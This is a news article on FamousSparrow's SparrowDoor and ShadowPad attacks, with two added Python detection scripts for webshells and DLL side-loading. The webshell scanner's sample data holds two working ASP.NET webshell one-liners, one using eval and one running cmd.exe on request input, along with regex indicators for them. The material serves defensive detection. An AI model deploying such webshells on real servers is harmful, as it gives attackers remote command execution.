
Chinese FamousSparrow hackers deploy upgraded malware in attacks

A China-linked cyberespionage group known as ‘FamousSparrow’ was observed using a new modular version of its signature backdoor ‘SparrowDoor’ against a US-based trade organization.

The activity and the new malware versions were observed by security researchers at ESET, who found evidence that the threat actor has been more active than previously thought since its operations were last publicly documented in 2022.

Apart from the US trade organization, which operates in the financial sector, other recent attacks ESET uncovered and linked to FamousSparrow targeted a Mexican research institute and a government institution in Honduras.

In all of these cases, initial access was achieved by exploiting outdated Microsoft Exchange and Windows Server endpoints and deploying webshells on them.
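Webshells dropped on an Exchange front end are usually the first artefact a responder can find, so a quick triage of server-side scripts under the IIS paths is a sensible first step. The following Python is an added example, not code from the article or from ESET: it scans a set of file contents for generic ASP.NET webshell indicators (an `eval` fed from the request, process spawning, `cmd.exe`, runtime compilation, and "tiny" scripts that still read request data). The indicator set, the paths and the file contents are all constructed for the example and are not the specific indicators from ESET's report.

```python
import re
from typing import Dict, List

# Server-side script extensions worth inspecting on an Exchange/IIS host.
SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asp", ".php")

# Generic webshell indicators. Assumption: these are common patterns seen in
# ASP.NET webshells in general, not the specific indicators from ESET's report.
INDICATORS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request", re.IGNORECASE),
    "unsafe_eval":     re.compile(r'"unsafe"', re.IGNORECASE),
    "process_start":   re.compile(r"System\.Diagnostics\.Process|\bStartInfo\b"),
    "cmd_reference":   re.compile(r"\bcmd\.exe\b", re.IGNORECASE),
    "base64_decode":   re.compile(r"FromBase64String"),
    "runtime_compile": re.compile(r"CompileAssemblyFromSource|Assembly\.Load\b"),
}

# Scripts this small that still read request data are rarely legitimate pages.
TINY_SCRIPT_BYTES = 120


def webshell_indicators(path: str, content: str) -> List[str]:
    """Return the indicator names that fire for one file (empty = nothing found)."""
    if not path.lower().endswith(SCRIPT_EXTENSIONS):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    if (len(content) < TINY_SCRIPT_BYTES and "<%" in content
            and re.search(r"\bRequest\b", content)):
        hits.append("tiny_request_handler")
    return hits


def scan(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious path to its indicators; clean files are omitted."""
    results: Dict[str, List[str]] = {}
    for path, content in files.items():
        hits = webshell_indicators(path, content)
        if hits:
            results[path] = hits
    return results


# Constructed sample file contents standing in for a directory listing taken
# from an Exchange server's IIS paths; the paths and contents are made up.
SAMPLE_FILES = {
    # One-liner "eval" shell dropped next to legitimate content.
    r"C:\inetpub\wwwroot\aspnet_client\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    # Legitimate-looking OWA page: no indicators.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><html><body><form runat="server">...</form></body></html>',
    # Command-execution shell planted under the OWA auth directory.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\authhelper.aspx":
        '<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process(); '
        'p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request["c"]; '
        'p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>',
    # Non-script file: skipped regardless of content.
    r"C:\inetpub\wwwroot\aspnet_client\readme.txt": "cmd.exe /c whoami",
}


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_FILES).items():
        print(f"SUSPICIOUS {path}: {', '.join(hits)}")
```

On a real host you would feed `scan()` the output of a directory walk over the IIS and Exchange web roots, and pair the hits with file creation times, since a webshell's timestamp usually lines up with the exploitation window in the IIS logs.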

Observed attack chain
Source: ESET

New modular SparrowDoor

ESET’s investigation actually uncovered two new versions of the SparrowDoor backdoor.

The first closely resembles a backdoor that Trend Micro attributed to ‘Earth Estries’: it features better code quality and architecture, an encrypted configuration, persistence mechanisms, and stealthy command-and-control (C2) switching.

A key new feature shared by both versions is parallel command execution: the backdoor keeps listening for and processing incoming commands while earlier, long-running ones are still executing.

“Both versions of SparrowDoor used in this campaign constitute considerable advances in code quality and architecture compared to older ones,” reads the ESET report.

“The most significant change is the parallelization of time-consuming commands, such as file I/O and the interactive shell. This allows the backdoor to continue handling new commands while those tasks are performed.”

The second, more recent variant carries the most significant changes: it is a modular backdoor with a plugin-based architecture.

It can receive new plugins from the C2 server at runtime; these are loaded entirely in memory, which expands its operational capabilities without writing additional components to disk.

The operations these plugins support include:

  • Shell access
  • File system manipulation
  • Keylogging
  • Proxying
  • Screenshot capturing
  • File transfer
  • Process listing/killing

The ShadowPad connection

Another interesting finding in ESET’s report is FamousSparrow’s use of ShadowPad, a versatile modular remote access trojan (RAT) associated with several Chinese APTs.

In the attacks ESET observed, ShadowPad was loaded through DLL side-loading by a renamed Microsoft Office IME executable, injected into the Windows Media Player process (wmplayer.exe), and connected to a C2 server already known to be associated with the RAT.
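That loading chain, a renamed signed binary side-loading an unsigned DLL and then injecting into wmplayer.exe, can be spotted from endpoint telemetry. The Python below is an added example, not code from the article or from ESET's report: it triages constructed Sysmon-style events, using process creation (Event ID 1, which carries the PE's OriginalFileName), image load (Event ID 7, with its Signed field) and CreateRemoteThread (Event ID 8), and correlates hits per ProcessGuid so the full chain stands out. The field names follow Sysmon's; the paths, GUIDs and the OriginalFileName value are made up, and the list of "trusted roots" is an assumption to tune per environment.

```python
import ntpath
from typing import Callable, Dict, List, Tuple

# Directories from which a legitimately installed binary is expected to run.
# Assumption: anything outside these is treated as "user-writable" for triage.
TRUSTED_ROOTS = (r"c:\windows", r"c:\program files")

INJECTION_TARGET = "wmplayer.exe"


def _under_trusted_root(path: str) -> bool:
    return path.lower().startswith(TRUSTED_ROOTS)


def is_renamed_binary(ev: Dict[str, object]) -> bool:
    """Event 1: the on-disk file name differs from the PE's OriginalFileName."""
    orig = str(ev.get("OriginalFileName", ""))
    return bool(orig) and orig.lower() != ntpath.basename(str(ev["Image"])).lower()


def is_unsigned_sideload(ev: Dict[str, object]) -> bool:
    """Event 7: an unsigned DLL loaded from the host's own, untrusted directory."""
    host_dir = ntpath.dirname(str(ev["Image"]))
    dll_dir = ntpath.dirname(str(ev["ImageLoaded"]))
    return (str(ev.get("Signed", "")).lower() == "false"
            and host_dir.lower() == dll_dir.lower()
            and not _under_trusted_root(host_dir))


def is_injection_into_target(ev: Dict[str, object], target: str = INJECTION_TARGET) -> bool:
    """Event 8: CreateRemoteThread into the target from some other process."""
    src = ntpath.basename(str(ev["SourceImage"])).lower()
    dst = ntpath.basename(str(ev["TargetImage"])).lower()
    return dst == target and src != target


RULES: Dict[int, Tuple[str, Callable[[Dict[str, object]], bool]]] = {
    1: ("renamed_binary", is_renamed_binary),
    7: ("unsigned_sideload", is_unsigned_sideload),
    8: (f"injection_into_{INJECTION_TARGET}", is_injection_into_target),
}


def triage(events: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group rule hits by ProcessGuid so the whole chain is visible at once."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        rule = RULES.get(int(ev["EventID"]))
        if rule and rule[1](ev):
            findings.setdefault(str(ev["ProcessGuid"]), []).append(rule[0])
    return findings


def full_chain(findings: Dict[str, List[str]]) -> List[str]:
    """ProcessGuids that hit every stage: rename, side-load and injection."""
    wanted = {name for name, _ in RULES.values()}
    return [guid for guid, hits in findings.items() if wanted <= set(hits)]


# Constructed events (Sysmon field names, made-up values); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # Renamed Office IME host running from a user-writable directory.
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Users\Public\Libraries\update.exe",
     "OriginalFileName": "OfficeImeHost.exe", "Company": "Microsoft Corporation"},
    # Unsigned DLL loaded from the same directory as its host.
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": r"C:\Users\Public\Libraries\update.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\imedict.dll", "Signed": "false"},
    # Remote thread created in Windows Media Player.
    {"EventID": 8, "ProcessGuid": "{A1}", "SourceImage": r"C:\Users\Public\Libraries\update.exe",
     "TargetImage": r"C:\Program Files\Windows Media Player\wmplayer.exe"},
    # Benign baseline: Word starting from Program Files with its real name.
    {"EventID": 1, "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "OriginalFileName": "WinWord.exe", "Company": "Microsoft Corporation"},
    # Same-directory load, but unsigned DLL under a trusted root: not flagged.
    {"EventID": 7, "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\addin.dll", "Signed": "false"},
]


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for guid, hits in found.items():
        print(guid, hits)
    print("full chain:", full_chain(found))
```

Each rule is noisy on its own (renamed binaries and unsigned loads are common on workstations); the value is in the correlation, which is why `triage()` keys everything by ProcessGuid and `full_chain()` only reports a process that trips all three stages.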

This suggests that FamousSparrow now has access to the same high-tier tooling shared among other Chinese state-sponsored actors.

ESET notes that Microsoft groups FamousSparrow, GhostEmperor, and Earth Estries under a single threat cluster it calls Salt Typhoon.

ESET, citing a lack of technical evidence for that grouping, tracks them as distinct groups, while acknowledging code similarities in their tools, similar exploitation techniques, and some infrastructure reuse.

ESET attributes these overlaps to a shared third-party supplier, a so-called “digital quartermaster,” that supports all of these Chinese threat groups from behind the scenes.
